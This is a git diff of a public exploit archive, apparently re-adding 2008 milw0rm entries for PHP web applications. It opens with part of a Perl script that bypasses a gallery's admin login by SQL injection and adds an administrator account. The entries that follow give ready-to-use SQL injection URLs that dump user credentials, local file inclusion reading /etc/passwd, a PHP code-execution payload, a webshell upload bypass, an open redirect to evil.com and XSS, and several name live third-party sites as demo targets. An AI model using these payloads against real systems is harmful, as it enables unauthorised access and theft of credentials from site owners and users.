+print "     / XXXXXX /  `\   /                       \n";
+print "    / XXXXXX /\______(                        \n";
+print "   / XXXXXX /                                 \n";
+print "  / XXXXXX /   .. CWH Underground ..  \n";
+print " (________(                                   \n";
+print "  `------'                                    \n";
+print "                                              \n";
+
+if ($#ARGV + 1 != 3)
+{
+   print "Usage: ./xpl.pl   \n";
+   print "Ex. ./xpl.pl http://www.target.com/gallery/ cwhuser cwhpass\n";
+   exit();
+}
+
+$blogurl = $ARGV[0];
+$user = $ARGV[1];
+$pass = $ARGV[2];
+
+$loginurl = $blogurl."?module=admin&action=login&task=login";
+$adduserurl = $blogurl."?module=admin&action=account&task=edit";
+$post_content = "username=".$user."&password=".$pass."&confirm_pass=".$pass."&btn_submit=Submit";
+
+
+print "\n..::Login Page URL::..\n";
+print "$loginurl\n";
+print "\n..::Add User Page URL::..\n";
+print "$adduserurl\n\n";
+print "..::Login Process::..\n";
+
+$ua = LWP::UserAgent->new;
+$ua->cookie_jar(HTTP::Cookies->new);
+$request = HTTP::Request->new (POST => $loginurl);
+$request->header (Accept-Charset => 'ISO-8859-1,utf-8;q=0.7,*;q=0.7');
+$request->content_type ('application/x-www-form-urlencoded');
+$request->content ('username=admin\'+or+\'a\'=\'&password=a&btn_submit=Submit'); 
+$response = $ua->request($request);
+$location = $response -> header('Location');
+
+print "\n[+]Result :: ";
+
+if ($location =~ /gallery_item_list/)
+{
+   print "Login Success!!!\n";
+}
+else
+{
+   print "Login Failed!!!\n";
+   exit();
+}
+
+print "\n..::Add Admin Exploit::..\n";
+$request = HTTP::Request->new (POST => $adduserurl);
+$request->content_type ('application/x-www-form-urlencoded');
+$request->content ($post_content);
+$response = $ua->request($request);
+
+   print "\n[+]Result\n";
+   print "Username :: ".$user."\n";
+   print "Password :: ".$pass."\n";
+   print "Role     :: Administrator\n";
+   print "\nEnjoy with Bugs ;)"
+
+# milw0rm.com [2008-10-23]
diff --git a/platforms/php/webapps/6821.txt b/platforms/php/webapps/6821.txt
index 1eedf851d..305133601 100755
--- a/platforms/php/webapps/6821.txt
+++ b/platforms/php/webapps/6821.txt
@@ -1,17 +1,17 @@
-/*
-
-   miniPortail <= 2.2 (XSS/LFI) Remote Vulnerabilities
-   -------------------------------------------------------
-   By StAkeR - StAkeR[at]hotmail[dot]it
-   http://www.easy-script.com/scripts-dl/miniportail.zip
-   -------------------------------------------------------
-   
-   -1 Local File Inclusion
-   -  search.php?lng=../../../../../../etc/passwd%00
-   
-   -2 Cross Site Scritping (POST)
-   -  search.php ()
-   
-*/
-
-# milw0rm.com [2008-10-23]
+/*
+
+   miniPortail <= 2.2 (XSS/LFI) Remote Vulnerabilities
+   -------------------------------------------------------
+   By StAkeR - StAkeR[at]hotmail[dot]it
+   http://www.easy-script.com/scripts-dl/miniportail.zip
+   -------------------------------------------------------
+   
+   -1 Local File Inclusion
+   -  search.php?lng=../../../../../../etc/passwd%00
+   
+   -2 Cross Site Scritping (POST)
+   -  search.php ()
+   
+*/
+
+# milw0rm.com [2008-10-23]
diff --git a/platforms/php/webapps/6822.txt b/platforms/php/webapps/6822.txt
index cbec77744..64c4ef480 100755
--- a/platforms/php/webapps/6822.txt
+++ b/platforms/php/webapps/6822.txt
@@ -1,88 +1,88 @@
-  WebSVN <= 2.0 Multiple Vulnerabilities
-	
-October 20, 2008
-Vendor 	: Tim Armes
-URL 	: http://websvn.tigris.org
-Version 	: WebSVN <= 2.0
-Risk 	: Multiple Vulnerabilities
-
-Description:
-WebSVN is an online SVN repository viewer. The description taken from 
-the project website reads "WebSVN offers a view onto your subversion 
-repositories that's been designed to reflect the Subversion methodology. 
-You can view the log of any file or directory and see a list of all the 
-files changed, added or deleted in any given revision. You can also view 
-the differences between 2 versions of a file so as to see exactly what 
-was changed in a particular revision." Unfortunately there are a several 
-issues in WebSVN may allow for an attacker to conduct cross site 
-scripting attacks, and create arbitrary files. There is also a code 
-execution issue in the v1 branch. 
-
-Cross Site Scripting
-There is a Cross Site Scripting issue in WebSVN due to the unsafe usage 
-of the PHP_SELF server variable within the getParameterisedSelfUrl() 
-function. 
-
-/index.php/">
-
-A url like the one above would display a JavaScript alert window 
-containing the cookie data of any set cookies for the domain. 
-
-File Handling Issues:
-There are some file handling issues in the RSS functionality used by 
-WebSVN. The issue is caused by the following bit of code taken from 
-rss.php, and allows arbitrary file operations to be executed. 
-
-// Cachename reflecting full path to and rev for rssfeed. Must end with xml to work
-$cachename = strtr(getFullURL($listurl), ":/\\?", "____");
-$cachename = $locwebsvnreal.DIRECTORY_SEPARATOR.'cache'.DIRECTORY_SEPARATOR.
-$cachename.@$_REQUEST['rev'].'_rssfeed.xml';
-
-As we can see from the above bit of code, the "rev" request variable is 
-never properly sanitized. in order to exploit this issue an attacker 
-would have to first send a valid "rev" parameter to rss.php, and then 
-traverse the known location. 
-
-/rss.php?rev=1_rssfeed.xml/../test.php%00
-
-So, if the "rev" parameter was initially set to the number one, then to 
-create a file called test.php in the root web directory a request like 
-the one above would have to be made. 
-
-PHP Code Execution:
-There is an arbitrary php code execution issue in the 1.* branch of 
-WebSVN due to the unsafe use of preg_replace evaluation when parsing 
-anchor tags and the like. 
-
-// Replace any usernames
-$ret = preg_replace("#\[:nom:([^\]]*)\]#e",
-	            "username(0, trim(\"\\1\"))",
-	             $ret);
-
-
-The above code can be found within the create_anchors() function located 
-in the utils.inc file. Since this function uses double quotes, instead 
-of single quotes in the evaluated code, php code execution is possible 
-via complex variable evaluation. 
-
-[:nom:{${phpinfo()}}]
-
-Even though this is not the current version, there is still many 1.* 
-installations being used as seen in the search below. 
-
-http://www.google.com/search?q=%22powered+by+websvn+v1*%22
-
-Solution:
-Unfortunately the developers have been mostly unresponsive to any 
-correspondence. The original bug report filed over a month ago can be 
-found at the link below. 
-
-http://websvn.tigris.org/issues/show_bug.cgi?id=179
-
-Even before this bug report was filed, any attempts made to contact the developers were unsuccessful.
-
-
-Credits:
-James Bercegay of the GulfTech Security Research Team
-
-# milw0rm.com [2008-10-23]
+  WebSVN <= 2.0 Multiple Vulnerabilities
+	
+October 20, 2008
+Vendor 	: Tim Armes
+URL 	: http://websvn.tigris.org
+Version 	: WebSVN <= 2.0
+Risk 	: Multiple Vulnerabilities
+
+Description:
+WebSVN is an online SVN repository viewer. The description taken from 
+the project website reads "WebSVN offers a view onto your subversion 
+repositories that's been designed to reflect the Subversion methodology. 
+You can view the log of any file or directory and see a list of all the 
+files changed, added or deleted in any given revision. You can also view 
+the differences between 2 versions of a file so as to see exactly what 
+was changed in a particular revision." Unfortunately there are a several 
+issues in WebSVN may allow for an attacker to conduct cross site 
+scripting attacks, and create arbitrary files. There is also a code 
+execution issue in the v1 branch. 
+
+Cross Site Scripting
+There is a Cross Site Scripting issue in WebSVN due to the unsafe usage 
+of the PHP_SELF server variable within the getParameterisedSelfUrl() 
+function. 
+
+/index.php/">
+
+A url like the one above would display a JavaScript alert window 
+containing the cookie data of any set cookies for the domain. 
+
+File Handling Issues:
+There are some file handling issues in the RSS functionality used by 
+WebSVN. The issue is caused by the following bit of code taken from 
+rss.php, and allows arbitrary file operations to be executed. 
+
+// Cachename reflecting full path to and rev for rssfeed. Must end with xml to work
+$cachename = strtr(getFullURL($listurl), ":/\\?", "____");
+$cachename = $locwebsvnreal.DIRECTORY_SEPARATOR.'cache'.DIRECTORY_SEPARATOR.
+$cachename.@$_REQUEST['rev'].'_rssfeed.xml';
+
+As we can see from the above bit of code, the "rev" request variable is 
+never properly sanitized. in order to exploit this issue an attacker 
+would have to first send a valid "rev" parameter to rss.php, and then 
+traverse the known location. 
+
+/rss.php?rev=1_rssfeed.xml/../test.php%00
+
+So, if the "rev" parameter was initially set to the number one, then to 
+create a file called test.php in the root web directory a request like 
+the one above would have to be made. 
+
+PHP Code Execution:
+There is an arbitrary php code execution issue in the 1.* branch of 
+WebSVN due to the unsafe use of preg_replace evaluation when parsing 
+anchor tags and the like. 
+
+// Replace any usernames
+$ret = preg_replace("#\[:nom:([^\]]*)\]#e",
+	            "username(0, trim(\"\\1\"))",
+	             $ret);
+
+
+The above code can be found within the create_anchors() function located 
+in the utils.inc file. Since this function uses double quotes, instead 
+of single quotes in the evaluated code, php code execution is possible 
+via complex variable evaluation. 
+
+[:nom:{${phpinfo()}}]
+
+Even though this is not the current version, there is still many 1.* 
+installations being used as seen in the search below. 
+
+http://www.google.com/search?q=%22powered+by+websvn+v1*%22
+
+Solution:
+Unfortunately the developers have been mostly unresponsive to any 
+correspondence. The original bug report filed over a month ago can be 
+found at the link below. 
+
+http://websvn.tigris.org/issues/show_bug.cgi?id=179
+
+Even before this bug report was filed, any attempts made to contact the developers were unsuccessful.
+
+
+Credits:
+James Bercegay of the GulfTech Security Research Team
+
+# milw0rm.com [2008-10-23]
diff --git a/platforms/php/webapps/6823.txt b/platforms/php/webapps/6823.txt
index 32e10e109..65d7c51b8 100755
--- a/platforms/php/webapps/6823.txt
+++ b/platforms/php/webapps/6823.txt
@@ -1,27 +1,27 @@
-SiteEngine 5.x Multiple Remote Vulnerabilities
-Due to incorrect use of intval function, leading to the logic of inspection parameters can be bypassed, resulting in SQL injection vulnerability.
-
--=0x01=- SQL injection Vulnerability
-vul code like this:
-if ( intval( $id ) )
-{
-    require_once( $site_engine_root."lib/rss.php" );
-$sql = "SELECT url FROM ".$tablepre."feed WHERE id={$id} AND uploader='{$SESSION['uid']}'";
-
-POC:
-http://www.test.com/announcements.php?id=1%bf%27%20and%201=2%20%20UNION%20select%201,2,user(),4,5,6,7,8,9,10,11%20/*
-This vulnerability exist in board.php too……
-
--=0x02=- URI Redirection Vulnerability
-POC:
-http://www.test.com/api.php?action=logout&forward=http://evil.com
-
--=0x03=- Information Disclosure Vulnerability
-POC:
-http://www.test.com/misc.php?action=php_info
-
-ForFun~
-
--=EOF=-
-
-# milw0rm.com [2008-10-23]
+SiteEngine 5.x Multiple Remote Vulnerabilities
+Due to incorrect use of intval function, leading to the logic of inspection parameters can be bypassed, resulting in SQL injection vulnerability.
+
+-=0x01=- SQL injection Vulnerability
+vul code like this:
+if ( intval( $id ) )
+{
+    require_once( $site_engine_root."lib/rss.php" );
+$sql = "SELECT url FROM ".$tablepre."feed WHERE id={$id} AND uploader='{$SESSION['uid']}'";
+
+POC:
+http://www.test.com/announcements.php?id=1%bf%27%20and%201=2%20%20UNION%20select%201,2,user(),4,5,6,7,8,9,10,11%20/*
+This vulnerability exist in board.php too……
+
+-=0x02=- URI Redirection Vulnerability
+POC:
+http://www.test.com/api.php?action=logout&forward=http://evil.com
+
+-=0x03=- Information Disclosure Vulnerability
+POC:
+http://www.test.com/misc.php?action=php_info
+
+ForFun~
+
+-=EOF=-
+
+# milw0rm.com [2008-10-23]
diff --git a/platforms/php/webapps/6826.txt b/platforms/php/webapps/6826.txt
index 19fac35a0..a4d9d1503 100755
--- a/platforms/php/webapps/6826.txt
+++ b/platforms/php/webapps/6826.txt
@@ -1,42 +1,42 @@
-#############################################################################
-#							                    #
-# Joomla Component Archaic Binary Gallery Directory Traversal Vulnerability #
-#							                    #
-#############################################################################
-
-
-########################################
-
-[~] Vulnerability found by: H!tm@N
-[~] Contact: hitman[at]khg-crew[dot]ws
-[~] Site: www.khg-crew.ws
-[~] Greetz: boom3rang, KHG, urtan, war_ning, chs, redc00de - [-=Kosova Hackers Group=-]
-
-########################################
-
-[~] ScriptName:    "Joomla"
-[~] Component:     "Archaic Binary Gallery (com_ab_gallery)"  
-[~] Version:       "1.0"
-[~] Author:        "Zharvek"
-[~] Author E-mail: "zharvek@archaicbinary.net"
-[~] Author URL:    "www.archaicbinary.net"
-
-########################################
-
-[~] Exploit: /index.php?option=com_ab_gallery&Itemid=37&gallery=[Directory]
-
-[~] Example: /index.php?option=com_ab_gallery&Itemid=37&gallery=/../../
-
-########################################
-
-[~] Live Demo: http://gsegyview.sourceforge.net/index.php?option=com_ab_gallery&Itemid=37&gallery=/../../
-
-########################################
-
-[~] Proud 2 be Albanian
-[~] Proud 2 be Muslim
-[~] United States of Albania
-
-########################################
-
-# milw0rm.com [2008-10-24]
+#############################################################################
+#							                    #
+# Joomla Component Archaic Binary Gallery Directory Traversal Vulnerability #
+#							                    #
+#############################################################################
+
+
+########################################
+
+[~] Vulnerability found by: H!tm@N
+[~] Contact: hitman[at]khg-crew[dot]ws
+[~] Site: www.khg-crew.ws
+[~] Greetz: boom3rang, KHG, urtan, war_ning, chs, redc00de - [-=Kosova Hackers Group=-]
+
+########################################
+
+[~] ScriptName:    "Joomla"
+[~] Component:     "Archaic Binary Gallery (com_ab_gallery)"  
+[~] Version:       "1.0"
+[~] Author:        "Zharvek"
+[~] Author E-mail: "zharvek@archaicbinary.net"
+[~] Author URL:    "www.archaicbinary.net"
+
+########################################
+
+[~] Exploit: /index.php?option=com_ab_gallery&Itemid=37&gallery=[Directory]
+
+[~] Example: /index.php?option=com_ab_gallery&Itemid=37&gallery=/../../
+
+########################################
+
+[~] Live Demo: http://gsegyview.sourceforge.net/index.php?option=com_ab_gallery&Itemid=37&gallery=/../../
+
+########################################
+
+[~] Proud 2 be Albanian
+[~] Proud 2 be Muslim
+[~] United States of Albania
+
+########################################
+
+# milw0rm.com [2008-10-24]
diff --git a/platforms/php/webapps/6827.txt b/platforms/php/webapps/6827.txt
index 2dffd88f9..628b15444 100755
--- a/platforms/php/webapps/6827.txt
+++ b/platforms/php/webapps/6827.txt
@@ -1,43 +1,43 @@
-#############################################################################
-#							                    #
-#            Joomla Component Kbase SQL Injection Vulnerability             #
-#							                    #
-#############################################################################
-
-
-########################################
-
-[~] Vulnerability found by: H!tm@N
-[~] Contact: hitman[at]khg-crew[dot]ws
-[~] Site: www.khg-crew.ws
-[~] Greetz: boom3rang, KHG, urtan, war_ning, chs, redc00de - [-=Kosova Hackers Group=-]
-
-########################################
-
-[~] ScriptName:    "Joomla"
-[~] Component:     "Kbase (com_kbase)"  
-[~] Version:       "1.2"
-[~] Date:          "?.?.2008"
-[~] Author:        "John Messingham Development Services"
-[~] Author E-mail: "mail@jmds.eu"
-[~] Author URL:    "www.jmds.eu"
-
-########################################
-
-[~] Exploit: /index.php?option=com_kbase&view=article&id=[SQL]
-
-[~] Example: /index.php?option=com_kbase&view=article&id=-1+union+select+1,concat(username,char(58),password)KHG,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+jos_users--
-
-########################################
-
-[~] Live Demo: http://netserv.ncesd.org/index.php?option=com_kbase&view=article&id=-1+union+select+1,concat(username,char(58),password)KHG,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+jos_users--
-
-########################################
-
-[~] Proud 2 be Albanian
-[~] Proud 2 be Muslim
-[~] United States of Albania
-
-########################################
-
-# milw0rm.com [2008-10-24]
+#############################################################################
+#							                    #
+#            Joomla Component Kbase SQL Injection Vulnerability             #
+#							                    #
+#############################################################################
+
+
+########################################
+
+[~] Vulnerability found by: H!tm@N
+[~] Contact: hitman[at]khg-crew[dot]ws
+[~] Site: www.khg-crew.ws
+[~] Greetz: boom3rang, KHG, urtan, war_ning, chs, redc00de - [-=Kosova Hackers Group=-]
+
+########################################
+
+[~] ScriptName:    "Joomla"
+[~] Component:     "Kbase (com_kbase)"  
+[~] Version:       "1.2"
+[~] Date:          "?.?.2008"
+[~] Author:        "John Messingham Development Services"
+[~] Author E-mail: "mail@jmds.eu"
+[~] Author URL:    "www.jmds.eu"
+
+########################################
+
+[~] Exploit: /index.php?option=com_kbase&view=article&id=[SQL]
+
+[~] Example: /index.php?option=com_kbase&view=article&id=-1+union+select+1,concat(username,char(58),password)KHG,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+jos_users--
+
+########################################
+
+[~] Live Demo: http://netserv.ncesd.org/index.php?option=com_kbase&view=article&id=-1+union+select+1,concat(username,char(58),password)KHG,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+jos_users--
+
+########################################
+
+[~] Proud 2 be Albanian
+[~] Proud 2 be Muslim
+[~] United States of Albania
+
+########################################
+
+# milw0rm.com [2008-10-24]
diff --git a/platforms/php/webapps/6829.txt b/platforms/php/webapps/6829.txt
index 77ee951b0..b3a071854 100755
--- a/platforms/php/webapps/6829.txt
+++ b/platforms/php/webapps/6829.txt
@@ -1,47 +1,47 @@
-==================================================================================================================
-          SSSSS  NN    N      AA      K   K  EEEEE  SSSSS        TTTTTTTTT EEEEE     AA     MM     MM
-          S      N N   N     A  A     K  K   E      S                T     E        A  A    M M   M M
-          SSSSS  N  N  N    AAAAAA    KKK    EEEEE  SSSSS            T     EEEEE   AAAAAA   M  M M  M
-              S  N   N N   A      A   K  K   E          S            T     E      A      A  M   M   M
-          SSSSS  N    NN  A        A  K   K  EEEEE  SSSSS            T     EEEEE A        A M       M
-===================================================SNAKES TEAM====================================================
-+                                                                                                                =
-=              AJ Forced Matrix Script   Remote SQL Injection Vulnerability                                        +
-+                                                                                                                =
-==============================================:::ALGERIAN HaCkEr:::===============================================
-                =        =                                                                =          =
-                =      =           Discovered By: yassine_enp  :::ALGERIAN HaCkEr:::         =     =   
-                =                                                                                    =
-                =    =    ************ ::::::home : www.snakespc.com/sc::::::***************     =   =
-                =                                                                                    =
-                =      =               :::::Mail: e1np@hotmail.com:::::::             =     =
-                =                                                                                    =
-                =        = ::::script Demo: http://www.ajsquare.com/resources/rss_reader/::::=         =
-                =               nome de script :rss_reader
-                                                                     =
-                ======================================yassine_enp===================================
-
-
-Exploit(1):
-********
-
-www.sit.com/[script_path]/EditUrl.php?url=-7+union+select+1,password,3,username+from+admin--
-
-Demo
-________
-
-http://www.ajsquare.com/resources/rss_reader/EditUrl.php?url=-7+union+select+1,password,3,username+from+admin--
-
-
-                                
-                                                    
-
-===================================================================================================================
-
-Mr.HCOCA_MAN:::DrEaDFuL:::super cristal:::His0k4:::sunhouse2:::aSSaSSin_HaCkErS:::THE INJECTOR:::ALL www.Snakespc.com/SC >>>> Members 
-
-===================================================================================================================
-                                  
-                                                          ::::e1np@Hotmail.CoM::::
-
-# milw0rm.com [2008-10-24]
+==================================================================================================================
+          SSSSS  NN    N      AA      K   K  EEEEE  SSSSS        TTTTTTTTT EEEEE     AA     MM     MM
+          S      N N   N     A  A     K  K   E      S                T     E        A  A    M M   M M
+          SSSSS  N  N  N    AAAAAA    KKK    EEEEE  SSSSS            T     EEEEE   AAAAAA   M  M M  M
+              S  N   N N   A      A   K  K   E          S            T     E      A      A  M   M   M
+          SSSSS  N    NN  A        A  K   K  EEEEE  SSSSS            T     EEEEE A        A M       M
+===================================================SNAKES TEAM====================================================
++                                                                                                                =
+=              AJ Forced Matrix Script   Remote SQL Injection Vulnerability                                        +
++                                                                                                                =
+==============================================:::ALGERIAN HaCkEr:::===============================================
+                =        =                                                                =          =
+                =      =           Discovered By: yassine_enp  :::ALGERIAN HaCkEr:::         =     =   
+                =                                                                                    =
+                =    =    ************ ::::::home : www.snakespc.com/sc::::::***************     =   =
+                =                                                                                    =
+                =      =               :::::Mail: e1np@hotmail.com:::::::             =     =
+                =                                                                                    =
+                =        = ::::script Demo: http://www.ajsquare.com/resources/rss_reader/::::=         =
+                =               nome de script :rss_reader
+                                                                     =
+                ======================================yassine_enp===================================
+
+
+Exploit(1):
+********
+
+www.sit.com/[script_path]/EditUrl.php?url=-7+union+select+1,password,3,username+from+admin--
+
+Demo
+________
+
+http://www.ajsquare.com/resources/rss_reader/EditUrl.php?url=-7+union+select+1,password,3,username+from+admin--
+
+
+                                
+                                                    
+
+===================================================================================================================
+
+Mr.HCOCA_MAN:::DrEaDFuL:::super cristal:::His0k4:::sunhouse2:::aSSaSSin_HaCkErS:::THE INJECTOR:::ALL www.Snakespc.com/SC >>>> Members 
+
+===================================================================================================================
+                                  
+                                                          ::::e1np@Hotmail.CoM::::
+
+# milw0rm.com [2008-10-24]
diff --git a/platforms/php/webapps/6830.txt b/platforms/php/webapps/6830.txt
index fda3085a2..c58a4790f 100755
--- a/platforms/php/webapps/6830.txt
+++ b/platforms/php/webapps/6830.txt
@@ -1,21 +1,21 @@
-//Title - NEPT Image Uploader shell upload
-
-//Vendor - newearthpt.freehostia.com
-
-//Version - 1.0
-
-//Status - vendor has been notified
-
-//Author - Dentrasi
-
-//Description
-
-It is possible to upload a php script to the remote site.
-
-
-1. Select a php file for upload
-2. Select it for upload, and tamperdata the request
-3. Change the Content-Type from 'application/octet-stream' to 'image/jpeg'
-4. If the link provided gives a 404, add 'upload/' before the file name
-
-# milw0rm.com [2008-10-24]
+//Title - NEPT Image Uploader shell upload
+
+//Vendor - newearthpt.freehostia.com
+
+//Version - 1.0
+
+//Status - vendor has been notified
+
+//Author - Dentrasi
+
+//Description
+
+It is possible to upload a php script to the remote site.
+
+
+1. Select a php file for upload
+2. Select it for upload, and tamperdata the request
+3. Change the Content-Type from 'application/octet-stream' to 'image/jpeg'
+4. If the link provided gives a 404, add 'upload/' before the file name
+
+# milw0rm.com [2008-10-24]
diff --git a/platforms/php/webapps/6833.txt b/platforms/php/webapps/6833.txt
index 4ce2ab081..8de2a6fe4 100755
--- a/platforms/php/webapps/6833.txt
+++ b/platforms/php/webapps/6833.txt
@@ -1,72 +1,72 @@
-   ___________________________________________________________________________________________________________
-  |  _          __  ___  ___ __________________     ___  ___ ____  ______  __  ___ _________________ _______  |
-  | | |        / / /  / /  //_______   _______/    /  / /  //    ||  ____||  |/  //     ___________//       \ |
-  | | |  ^    / / /  /_/  /  /__/  /  /___    ___ /  /_/  //     ||  |    |  v  //     /___        /    O   / |
-  | | | / \  / / /   _   /  /  /  /  ____/   /__//  __   //  /|  ||  |    |     \\    ____/       /        /  |
-  | | |/   \/ / /  / /  /  /  /  /  /_______    /  / /  //  /_|  ||  |___ |  |\  \\  /__________ /    /\   \  |
-  | | /  /\  / /__/ /__/  /__/  /__________/   /__/ /__//________||______||__| \__\\___________//____/  \___\ |
-  | |   /  \/                                                                                                 |
-  | |  / _____________________________________________________________________________________________________|
-  | | / /    .: PHPdaily Multiple Remote Vulnerabilities (SQL-INJ,XSS,Local File Download Vulnerability):.    |
-  | |/ /______________________________________________________________________________________________________|
-  | v / Discoverd By:  0xFFFFFF                            . Main THX: ALLAH                                  |
-  |  /  Home:          www.white-hacker.com                . Greetz To: All Hackers & WHITE-HACKER Team       |
-  | /   Mail:          admin(at)white-hacker[dot]com       .                                                  |
-  |/    Country:       Algeria                             .                                                  |
-  v___________________________________________________________________________________________________________|
-  |     Publication info :.                                                                                   |
-  |___________________________________________________________________________________________________________|
-  |     Date:          23-10-2008                          . Method   :         [*] GET   [ ] POST            |
-  |     Content:       Vulnerability                       . Register Globals : [ ] ON    [*] OFF             |
-  |     Type:          SQL-INJ,XSS,LFD                     . Magic quotes :     [*] ON    [ ] OFF             |
-  |     Application:   PHPdaily                            . Risk:              [*] High  [ ] medium  [ ] Low |
-  |     Venedor site:  http://phpdaily.self-reliance.be/   .                                                  |
-  |     Version:       N/A                                 .                                                  |
-  |     -------------------------------------------------- .                                                  |
-  |     Impact:        Exploring Database                  .                                                  |
-  |                    Run unauthorized JavaScript         .                                                  |
-  |                    Local File Download                 .                                                  |
-  |     -------------------------------------------------- .                                                  |
-  |     Exploit:       Available                           .                                                  |
-  |     Fix:           N/A                                 .                                                  |
-  |___________________________________________________________________________________________________________|
-  | Description :.                                                                                            |
-  |___________________________________________________________________________________________________________|
-  |                                                                                                           |
-  | After a quick audit, I have noticed that PHPdaily is a very weak script which contains many types of      |
-  | vulnerabilities.                                                                                          |
-  |                                                                                                           |
-  | Inputs "id,prev" passed into add_postit.php,delete.php,prest_detail.php,mod_prest_date.php pages are not  |
-  | properly verified, a simple user can easily get sensitive information from the database by injecting      |
-  | SQL Queries.                                                                                              |
-  |                                                                                                           |
-  | Also through "download_file.php" page via the input "fichierwe" any user can download any local file.     |
-  | Furthermore, through "add_prest_date.php" page there is the ability of XSS.                               |
-  |                                                                                                           |
-  | ......................................................................................................... |
-  |                                                                                                           |
-  | Requirement                                                                                               |
-  | You have to connect as a simple user                                                                      |
-  |                                                                                                           |
-  | 1. SQL injection Exploit :                                                                                |
-  | [Site]add_postit.php?mode=rep&id=-1+union+select+1,2,3,version(),5,6,7,8#                                 |
-  | [Site]delete.php?prev=accueil&mode=postit&id=[SQL-INJ] (-1+union+select+[17 Columns])                     |
-  | [Site]prest_detail.php?prev=[SQL-INJ]                                                                     |
-  | [Site]mod_prest_date.php?prev=list&id=[SQL-INJ]                                                           |
-  |                                                                                                           |
-  | 2. Local File Download Exploit :                                                                          |
-  | [Site]download_file.php?fichier=../include/connect.php                                                    |
-  | [Site]download_file.php?fichier=../../../../../../etc/passwd                                              |
-  |                                                                                                           |
-  | 3. XSS Exploit:                                                                                           |
-  | [Site]add_prest_date.php?date=">                                   |
-  |___________________________________________________________________________________________________________|
-  | Notice :.                                                                                                 |
-  |___________________________________________________________________________________________________________|
-  | These publications are published for educational purpose thus the author will be not responsible          |
-  | for any damage.                                                                                           |
-  |___________________________________________________________________________________________________________|
-                                                \  © WHITE-HACKER  All contents © 2008. All rights reserved.  |
-                                                   \____________________________________________________________|
-
-# milw0rm.com [2008-10-24]
+   ___________________________________________________________________________________________________________
+  |  _          __  ___  ___ __________________     ___  ___ ____  ______  __  ___ _________________ _______  |
+  | | |        / / /  / /  //_______   _______/    /  / /  //    ||  ____||  |/  //     ___________//       \ |
+  | | |  ^    / / /  /_/  /  /__/  /  /___    ___ /  /_/  //     ||  |    |  v  //     /___        /    O   / |
+  | | | / \  / / /   _   /  /  /  /  ____/   /__//  __   //  /|  ||  |    |     \\    ____/       /        /  |
+  | | |/   \/ / /  / /  /  /  /  /  /_______    /  / /  //  /_|  ||  |___ |  |\  \\  /__________ /    /\   \  |
+  | | /  /\  / /__/ /__/  /__/  /__________/   /__/ /__//________||______||__| \__\\___________//____/  \___\ |
+  | |   /  \/                                                                                                 |
+  | |  / _____________________________________________________________________________________________________|
+  | | / /    .: PHPdaily Multiple Remote Vulnerabilities (SQL-INJ,XSS,Local File Download Vulnerability):.    |
+  | |/ /______________________________________________________________________________________________________|
+  | v / Discoverd By:  0xFFFFFF                            . Main THX: ALLAH                                  |
+  |  /  Home:          www.white-hacker.com                . Greetz To: All Hackers & WHITE-HACKER Team       |
+  | /   Mail:          admin(at)white-hacker[dot]com       .                                                  |
+  |/    Country:       Algeria                             .                                                  |
+  v___________________________________________________________________________________________________________|
+  |     Publication info :.                                                                                   |
+  |___________________________________________________________________________________________________________|
+  |     Date:          23-10-2008                          . Method   :         [*] GET   [ ] POST            |
+  |     Content:       Vulnerability                       . Register Globals : [ ] ON    [*] OFF             |
+  |     Type:          SQL-INJ,XSS,LFD                     . Magic quotes :     [*] ON    [ ] OFF             |
+  |     Application:   PHPdaily                            . Risk:              [*] High  [ ] medium  [ ] Low |
+  |     Venedor site:  http://phpdaily.self-reliance.be/   .                                                  |
+  |     Version:       N/A                                 .                                                  |
+  |     -------------------------------------------------- .                                                  |
+  |     Impact:        Exploring Database                  .                                                  |
+  |                    Run unauthorized JavaScript         .                                                  |
+  |                    Local File Download                 .                                                  |
+  |     -------------------------------------------------- .                                                  |
+  |     Exploit:       Available                           .                                                  |
+  |     Fix:           N/A                                 .                                                  |
+  |___________________________________________________________________________________________________________|
+  | Description :.                                                                                            |
+  |___________________________________________________________________________________________________________|
+  |                                                                                                           |
+  | After a quick audit, I have noticed that PHPdaily is a very weak script which contains many types of      |
+  | vulnerabilities.                                                                                          |
+  |                                                                                                           |
+  | Inputs "id,prev" passed into add_postit.php,delete.php,prest_detail.php,mod_prest_date.php pages are not  |
+  | properly verified, a simple user can easily get sensitive information from the database by injecting      |
+  | SQL Queries.                                                                                              |
+  |                                                                                                           |
+  | Also through "download_file.php" page via the input "fichierwe" any user can download any local file.     |
+  | Furthermore, through "add_prest_date.php" page there is the ability of XSS.                               |
+  |                                                                                                           |
+  | ......................................................................................................... |
+  |                                                                                                           |
+  | Requirement                                                                                               |
+  | You have to connect as a simple user                                                                      |
+  |                                                                                                           |
+  | 1. SQL injection Exploit :                                                                                |
+  | [Site]add_postit.php?mode=rep&id=-1+union+select+1,2,3,version(),5,6,7,8#                                 |
+  | [Site]delete.php?prev=accueil&mode=postit&id=[SQL-INJ] (-1+union+select+[17 Columns])                     |
+  | [Site]prest_detail.php?prev=[SQL-INJ]                                                                     |
+  | [Site]mod_prest_date.php?prev=list&id=[SQL-INJ]                                                           |
+  |                                                                                                           |
+  | 2. Local File Download Exploit :                                                                          |
+  | [Site]download_file.php?fichier=../include/connect.php                                                    |
+  | [Site]download_file.php?fichier=../../../../../../etc/passwd                                              |
+  |                                                                                                           |
+  | 3. XSS Exploit:                                                                                           |
+  | [Site]add_prest_date.php?date=">                                   |
+  |___________________________________________________________________________________________________________|
+  | Notice :.                                                                                                 |
+  |___________________________________________________________________________________________________________|
+  | These publications are published for educational purpose thus the author will be not responsible          |
+  | for any damage.                                                                                           |
+  |___________________________________________________________________________________________________________|
+                                                \  © WHITE-HACKER  All contents © 2008. All rights reserved.  |
+                                                   \____________________________________________________________|
+
+# milw0rm.com [2008-10-24]
diff --git a/platforms/php/webapps/6835.txt b/platforms/php/webapps/6835.txt
index b6a52eb70..6340fc55c 100755
--- a/platforms/php/webapps/6835.txt
+++ b/platforms/php/webapps/6835.txt
@@ -1,58 +1,58 @@
-        ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
-        +                                                                    +
-        +        BuzzyWall Remote File Disclosure Vulnerability              +
-        +                                                                    +
-        +                     Discovered by b3hz4d                           +
-        +                                                                    +
-        +                     WwW.DeltaHacking.Net                           +
-        +                                                                    +
-        +                                                                    +
-        +                                                                    +
-        ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
-
-
-		
-AUTHOR : b3hz4d
